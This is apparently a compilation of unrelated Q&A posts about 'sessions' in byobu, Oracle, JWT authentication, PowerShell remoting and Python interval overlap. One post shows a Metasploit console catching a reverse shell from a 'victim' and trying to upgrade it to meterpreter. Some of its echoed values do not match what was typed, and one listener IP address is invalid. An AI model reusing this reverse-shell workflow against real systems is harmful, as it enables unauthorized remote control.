14.04 – How to set the TERM variable in byobu (tmux) startup files with named sessions

I use byobu 5.77 with tmux 1.8-5 on Ubuntu 14.04. When I start a new byobu instance, my TERM variable is not set. Thus, I added export TERM=screen-256color to ~/.byoburc. It works fine. But when I start a new named session, i.e. byobu new -s <session_name>, the TERM variable is not set again. What is going on and how to fix it (so that the TERM variable would be set in named sessions too)?

Restore open Terminal sessions from Time Machine backup?

I just did a Time Machine restore of the full system on Catalina, and seems to have worked pretty well, with one exception – I had several Terminal windows open with bash history, but these haven’t been restored this time.

Where are these past terminal sessions stored? Could there be a way for me to restore these files specifically from some past Time Machine backup?

I did this once before with Chrome when it lost open windows and tabs; Chrome is a little temperamental when restoring open windows and tabs; in this case it restored some but not all; then, close the app and reopen it and all the original tabs appeared. Not so with Terminal, though (I closed and reopened the app and the lost windows don’t appear).

Wondering if anyone knows which files I could look for on a Time Machine backup and try restoring those specific files manually to get the sessions back.

oracle – How to connect to specific session id & serial# ? Blocked sessions

I have blocked sessions and see which session is blocking them, having session_id and serial#. Is it possible to connect to such session? How?

Background: using V$SESSION_BLOCKERS I see sessions are blocked by each other by INSERT statements to one of two tables: _REQUEST and _RESPONSE

Blocked sessions wait event: enq: TX - row lock contention

Query 1:

insert into _REQUEST (creation_date, IS_PROCESSED, name, packet, PARENT_SKID, BATCH_SKID, retry_delay, revision, SERVICE_NAME, ttl, type, REQUEST_SKID)
values (:1 , :2 , :3 , :4 , :5 , :6 , :7 , :8 , :9 , :10 , :11 , :12 )

Query 2a (from DB trigger, :B1 is a payload):

SELECT COALESCE(ERROR_DETAILS, ERROR_MESSAGE, FAULT_REASON, SOAP_ERROR) AS ERROR_MESSAGE, ERROR_CODE 
FROM XMLTABLE( '//*:DataHandlerWebServiceException | //*:Fault | //*:PLMDataHandlerError' 
     PASSING XMLTYPE(:B1 )
     COLUMNS ERROR_DETAILS VARCHAR2(256) PATH '*:errorDetails'
            ,ERROR_MESSAGE VARCHAR2(256) PATH '*:errorMessage'
            ,ERROR_CODE VARCHAR2(8) PATH '*:errorCode'
            ,FAULT_REASON VARCHAR2(256) PATH '*:Reason/*:Text'
            ,SOAP_ERROR VARCHAR2(256) PATH '*:COMMON_LOG_MESSAGE/*:LOG_MESSAGE' )

Query 2b (we already know APPEND is ignored here, see Note 1):

INSERT /*+ append */ INTO _response( RESPONSE_SKID, REQUEST_SKID, HAS_FAILED, WAS_TIMEOUT, IS_PROCESSED, SOAP_REQUEST_TIMESTAMP, SOAP_RESPONSE_TIMESTAMP, RESPONSE_HTTP_STATUS, ERROR_MESSAGE, RESPONSE_BODY )
values ( :1 , :2 , :3 , :4 , :5 , :6 , :7 , :8 , :9 , :10 )

How is it possible that INSERTs, to different tables, are blocking the sessions? I was looking into V$ACTIVE_SESSION_HISTORY but don’t find anything yet (I’m not a DBA yet)

Note 1: APPEND hint ignored

Metasploit: Issue with upgrading a low privilege shell (sessions -u)

Setup info: I don’t believe this is the issue as I regularly update my system. I’ll add one piece of information as an example. If you would really like to see the rest, then I can add more later.

metasploit v5.0.89-dev

Payload: I used a custom python script to create a reverse shell from the victim’s computer to the attacker. No problem with the low priv shell in netcat or metasploit. If anyone wants to take a look at the script I can upload it to github and share the link (though it’s nothing special, I’d prefer to send the link privately to keep the script as less spread as possible).

Exact Steps I took:

msf5 > use multi/handler
msf5 exploit(multi/handler) > set payload windows/x64/shell_reverse_tcp
payload => windows/x64/shell_reverse_tcp
msf5 exploit(multi/handler) > set LPORT 549 
LPORT => 443
msf5 exploit(multi/handler) > set LHOST 10.8.210.314
LHOST => 10.9.139.110
msf5 exploit(multi/handler) > run

[*] Started reverse TCP handler on 10.9.139.110:443 
[*] Command shell session 1 opened (10.9.139.110:443 -> 10.9.0.1:50071) at 2020-05-30 22:31:25 -0400


Login: password
You have a shell have fun #> background

Background session 1? (y/N)  y
msf5 exploit(multi/handler) > sessions -u 1
[*] Executing 'post/multi/manage/shell_to_meterpreter' on session(s): [1]

The Issue:

[*] Upgrading session ID: 1
[*] Starting exploit/multi/handler
[*] Started reverse TCP handler on 10.9.139.110:4433 
[-] Post failed: NoMethodError undefined method `reverse!' for nil:NilClass
[-] Call stack:
[-]   /usr/share/metasploit-framework/lib/msf/core/session/provider/single_command_shell.rb:136:in `shell_command_token_win32'
[-]   /usr/share/metasploit-framework/lib/msf/core/session/provider/single_command_shell.rb:84:in `shell_command_token'
[-]   /usr/share/metasploit-framework/lib/msf/core/post/common.rb:147:in `cmd_exec'
[-]   /usr/share/metasploit-framework/lib/msf/core/post/windows/powershell.rb:32:in `have_powershell?'
[-]   /usr/share/metasploit-framework/modules/post/multi/manage/shell_to_meterpreter.rb:161:in `run'

Note: I have taken a look at some of the files, but they seem to be coded in Ruby (something I am not familiar with) and the error seems to be related to multiple files, so I have no clue how to really debug this. There also seem to be similar issues posted on GitHub, if it helps.

authentication – Are JWT still not recommended for sessions?

It seems there is a large divide as to whether or not you should have JWT or Session ID for managing user sessions on a WebApp/API (for a web front end and/or a mobile app).

It seems that the consensus goes to not using JWT (1,2,3,4) and keep on using cookies, but I’ve seen more and more tutorials and people using JWT by default.

Even OWASP now uses JWT as a session token instead of cookies (it is stored in the authorisation header/cookies and not in local storage, obviously… but that’s not a hard task).

I’m trying to look at it neutrally and they seem to fit my usage:

  • session ids also have an expiration date that can be long or short, so I fail to see how it is an argument.
  • session ids are persisted in the backend, so having a blacklist for JWT doesn’t seem to be a “worse” solution
  • implementations are of the same level of complexity.

While with JWT i can:

  • store data inside the cookie, which is a nice feature to have (for roles for example)
  • fail my queries early if the token is in the blacklist / if the data stored in the token is not validated (i.e. try to access a route where your role, stored in the JWT, shouldn’t have access)
  • be stateless on some routes, if needed / possible / less security required (no blacklist).
  • use them as one-time tokens for download

Is it still not recommended to use them as sessions? Are there security issues I’m not aware of? Both could work for my use case, but JWT would allow me to do more and currently I’m leaning towards using sessions “just because” of the consensus.
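The checks this question lists for a JWT used as a session token (expiry, a blacklist, a role stored in the token), as an added Python example that is not part of the original post. The key, the claim names and the `issue`/`verify` helpers are assumptions made for illustration; it uses HS256 and only the standard library.

```python
import base64, hashlib, hmac, json, time

SECRET = b"constructed-demo-key"  # constructed key, illustration only
REVOKED_JTI = set()               # server-side blacklist of token ids

def b64url(data):
    return base64.urlsafe_b64encode(data).rstrip(b"=")

def unb64url(text):
    return base64.urlsafe_b64decode(text + b"=" * (-len(text) % 4))

def sign(signing_input):
    return b64url(hmac.new(SECRET, signing_input, hashlib.sha256).digest())

def issue(sub, role, jti, ttl, now=None):
    now = int(time.time()) if now is None else now
    header = b64url(json.dumps({"alg": "HS256", "typ": "JWT"}).encode())
    claims = {"sub": sub, "role": role, "jti": jti, "exp": now + ttl}
    body = b64url(json.dumps(claims).encode())
    return b".".join([header, body, sign(header + b"." + body)]).decode()

def verify(token, required_role, now=None):
    """Return (claims, reason); claims is None when the request must fail."""
    now = int(time.time()) if now is None else now
    try:
        header, body, sig = token.encode().split(b".")
        # Pin the algorithm: never let the token choose how it is verified.
        if json.loads(unb64url(header)).get("alg") != "HS256":
            return None, "bad algorithm"
        if not hmac.compare_digest(sig, sign(header + b"." + body)):
            return None, "bad signature"
        claims = json.loads(unb64url(body))
    except (ValueError, TypeError, AttributeError):
        return None, "malformed"
    if claims.get("exp", 0) <= now:          # expiry, as with a session id
        return None, "expired"
    if claims.get("jti") in REVOKED_JTI:     # the one stateful lookup
        return None, "revoked"
    if claims.get("role") != required_role:  # fail early on the signed role
        return None, "forbidden"
    return claims, "ok"
```

The role check trusts the claim only because the signature was verified first; the blacklist lookup is the part that makes logout and revocation possible, and also the part that is no longer stateless.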

Kerberos second-hops using PowerShell Sessions

I often use PowerShell remote sessions to manage Windows servers remotely, generally using the following command, though the following is true for any remote PowerShell commands such as Invoke-Command:

Enter-PSSession Server01

This works perfectly for almost everything local to that server, but never allows you to reach outside, e.g.:

PS C:\> Enter-PSSession Server01
[Server01]: PS C:\> Get-Item '\\Server02\Share\File'

get-item : Access is denied

What is the easiest, secure way to do a second-hop like this? I have a couple answers I’ll add, but they generally have caveats.

Python – Merge overlapping sessions. How do I find the end value of the session?

I have the following block of code that determines the number of overlapping sessions. In the case of different intervals, the task is to print the maximum number of overlaps between these intervals at any time and also to determine the overlapping interval.

def overlap(v):

    # variable to store the maximum
    # count
    ans = 0
    count = 0
    data = []

    # storing the x and y
    # coordinates in data vector
    for i in range(len(v)):

        # pushing the x coordinate
        data.append((v[i][0], 'x'))

        # pushing the y coordinate
        data.append((v[i][1], 'y'))

    # sorting of ranges
    data = sorted(data)

    # Traverse the data vector to
    # count number of overlaps
    for i in range(len(data)):

        # if x occur it means a new range
        # is added so we increase count
        if (data[i][1] == 'x'):
            count += 1

        # if y occur it means a range
        # is ended so we decrease count
        if (data[i][1] == 'y'):
            count -= 1

        # updating the value of ans
        # after every traversal
        ans = max(ans, count)

    # printing the maximum value
    print(ans)

# Driver code
v = [[1, 2], [2, 4], [3, 6], [3, 8]]
overlap(v)

This is coming back 3. But what would be the best way to return the maximum overlap interval? In this case it should be (3,4). How can I change my existing code to get the required output? I've found a counter approach, but I'm trying to find a complete solution with my approach.

Python – Merge overlapping sessions

I have the following block of code that determines the number of overlapping sessions. In the case of different intervals, the task is to print the maximum number of overlaps between these intervals at any time and also to determine the overlapping interval.

def overlap(v):

    # variable to store the maximum
    # count
    ans = 0
    count = 0
    data = []

    # storing the x and y
    # coordinates in data vector
    for i in range(len(v)):

        # pushing the x coordinate
        data.append((v[i][0], 'x'))

        # pushing the y coordinate
        data.append((v[i][1], 'y'))

    # sorting of ranges
    data = sorted(data)

    # Traverse the data vector to
    # count number of overlaps
    for i in range(len(data)):

        # if x occur it means a new range
        # is added so we increase count
        if (data[i][1] == 'x'):
            count += 1

        # if y occur it means a range
        # is ended so we decrease count
        if (data[i][1] == 'y'):
            count -= 1

        # updating the value of ans
        # after every traversal
        ans = max(ans, count)

    # printing the maximum value
    print(ans)

# Driver code
v = [[1, 2], [2, 4], [3, 6], [3, 8]]
overlap(v)

This is coming back 3. So that answers the first question.
But what would be the best way to return the maximum overlap interval? In this case it should be (3,4). I found an O(n^2) solution. But how could you best answer the second part?
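One way to get the interval from the same sorted-endpoint sweep used in both versions of this question, as an added example that is not part of the original posts. The function name `max_overlap` is an assumption; like the posted code, it treats sessions that touch at an endpoint as overlapping, and it reports the first window that reaches the maximum.

```python
def max_overlap(sessions):
    """Return (max_count, (start, end)) of the first busiest window."""
    events = []
    for start, end in sessions:
        # 0 marks a start and 1 an end, so a start sorts before an end at
        # the same time (same tie-break as 'x' < 'y' in the posted code).
        events.append((start, 0))
        events.append((end, 1))
    events.sort()

    best = count = 0
    window_start = window_end = None
    window_open = False  # True while we are inside the current best window

    for point, kind in events:
        if kind == 0:
            count += 1
            if count > best:
                # A new maximum begins at this start point.
                best, window_start, window_open = count, point, True
        else:
            if window_open and count == best:
                # The first session to end closes the busiest window.
                window_end, window_open = point, False
            count -= 1

    if best == 0:
        return 0, None
    return best, (window_start, window_end)


# Sample input taken from the question.
print(max_overlap([(1, 2), (2, 4), (3, 6), (3, 8)]))
```

The sweep is O(n log n) because of the sort; the single pass afterwards is linear.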

Authentication – In Memory JWT for API authentication with HTTP-only cookie for sessions?

I've read about it for a while and know this is a common topic, but I was hoping to get some feedback on my authentication approach.

I have a SPA. It needs to authenticate to 1) my application backend and 2) some APIs on AWS. I use cognito to authenticate user credentials.

My idea of doing this is as follows:

  1. The user authenticates using the AWS Cognito API
  2. Receives JWT
  3. Keeps JWT in memory only (no local storage – XSS)
  4. Passes JWT to the application backend
  5. The backend only sets a secure HTTP cookie on the client. It stores the JWT in this cookie.
  6. Cookie is used to manage sessions with the app backend
  7. In-memory JWT is used for authentication with AWS APIs

This is fine, but when the user closes the browser or changes tabs, the JWT is not in memory. However, you still have the session cookie. So my thought is that the application server will be asked for the JWT (within the cookie) before calling the AWS APIs.

That way, I have a secure HTTP-only cookie that manages sessions with my app server, and I also have the JWT to authenticate to the AWS APIs. If the user has a valid session cookie, it means that they can have the JWT it contains.

My only concern is that it appears a little circular. JWT authenticates itself to receive a cookie that will authenticate in the future to receive an updated JWT. Otherwise, I find it pretty solid.

Thoughts?